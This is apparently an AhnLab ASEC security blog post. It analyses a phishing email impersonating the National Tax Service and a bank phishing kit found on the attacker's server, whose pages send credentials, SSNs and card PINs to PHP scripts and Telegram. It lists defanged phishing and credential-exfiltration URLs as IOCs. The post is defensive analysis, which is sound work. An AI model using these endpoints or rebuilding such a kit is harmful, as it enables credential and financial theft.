Phishing Web Server Identified Through an Impostor National Tax Service Email

The ASEC analysis team recently discovered that a phishing email impersonating the National Tax Service was being distributed. This phishing email emphasizes the urgency of the company email password expiring on the same day, and it is being sent with a message urging recipients to extend their password duration before the account is locked.  

Figure 1. Original email

Figure 2. Phishing site for entering account information

Figure 3. Source code of the login page

Clicking the hyperlink inserted to the “keep same password” text redirects the user to the company email login page. The HTML script code of this page is as shown above. As can be seen from the code, this page has a structure of leaking the user account credentials to the threat actor’s server once the user logs in.

Figure 4. The threat actor’s server

  • Phishing page URL: hxxps://cloudflare-ipfs[.]com/ipfs/QmRgn9xHYkCoGyj39wQBwfYo7MZ2dtJEh1h9RQ5hcyBqGa?filename=logsinfo.html#[User Email Address]
  • User credentials-leaking URL: hxxps://jy****ud[.]com/service2/online/dollar/sure/logs/gen.php

Users must not only check the authenticity of emails but also that the URL of the linked pages are the original domains. Accessing the top-level domain of this case revealed a web server where component files for phishing were uploaded.

As shown in Figure 4, some files seemed to be used by the threat actor when making various phishing websites. Certain directories had multiple intricately made script files for phishing through impersonating a bank in the US. In particular, the login page was so similar to the actual bank’s web page that ordinary users could not notice the difference upon landing on the fake page.

Figure 5. Files used in the bank web server

Below, we will explain how personal information is transmitted to the attacker through the following factors: (1) the login page made by the threat actor for phishing, (2) personal information input page, and (3) card information input page. There are also additional pages, including a user email information input page and a security question page for the email account.

  1. Login Page 

Figure 6. Login page

When the user enters their account credentials on the login page, the input information is transmitted to darkx/mainnet.php, created by the threat actor. As shown in Figure 7, the php site receives the user account credentials and IP information and saves it as a txt file before sending the same information over Telegram.

Figure 7. php code linked to the login page

We can see that as a result, when the threat actor user’s personal information from each phishing page, the collected information is saved as a txt file with the same name as the web page (See Figure 8). The actual account credentials and IP addresses of users who logged in via login.html were saved to the login.txt file.

Figure 8. Text file where personal information is saved to

Figure 9. The login.txt file containing user account credentials

  1. Personal Details Input Page

Figure 10. Personal details input page

Figure 11. The account_verify.txt file containing detailed personal information

We also found that the information entered by users in the personal details input page is sent to the threat actor’s php page as well and that the threat actor collects it alongside the IP information in a txt file. Personal information collected by the threat actor includes social security numbers (SSN) which have a similar role as Korea’s resident registration number. It is expected that if such pieces of personal information are stolen, the damages will be grave.

  1. Card Information Input Page

Figure 12. Card information input page

Figure 13. The credit_Verify.txt file containing card information

When users enter their information in the card information input page made by the threat actor, the bank member’s credit card number, card password, and ATM PINs can be leaked by the threat actor through the same route.

The threat actor’s server that was recently discovered by the ASEC analysis team not only has a web server that impersonates a bank but also PNG image files used in the login page of a certain corporation and the logo image of a particular web hosting provider of the US. Therefore, it is suspected that the threat actor has made fake phishing websites for these corporate websites as well.

As threat actors are becoming more intricate in impersonating various corporations to deceive users, users must refrain from opening emails from untrusted senders. In particular, due to the characteristics of banking phishing websites, a variety of personal information including sensitive information can be stolen, so extra caution is advised.

[IOC]
hxxps://cloudflare-ipfs[.]com/ipfs/QmRgn9xHYkCoGyj39wQBwfYo7MZ2dtJEh1h9RQ5hcyBqGa?filename=logsinfo.html#
hxxps://jy****ud[.]com/service2/online/dollar/sure/logs/gen.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

3.7 3 votes
Article Rating
guest

1 Comment
Inline Feedbacks
View all comments
trackback

[…] page were sent to a particular C2, and the address of this C2 is the same domain as that covered in a blog post published in January 2023 about a phishing web server. From this, we can assume that the same threat actor is performing phishing attacks in various […]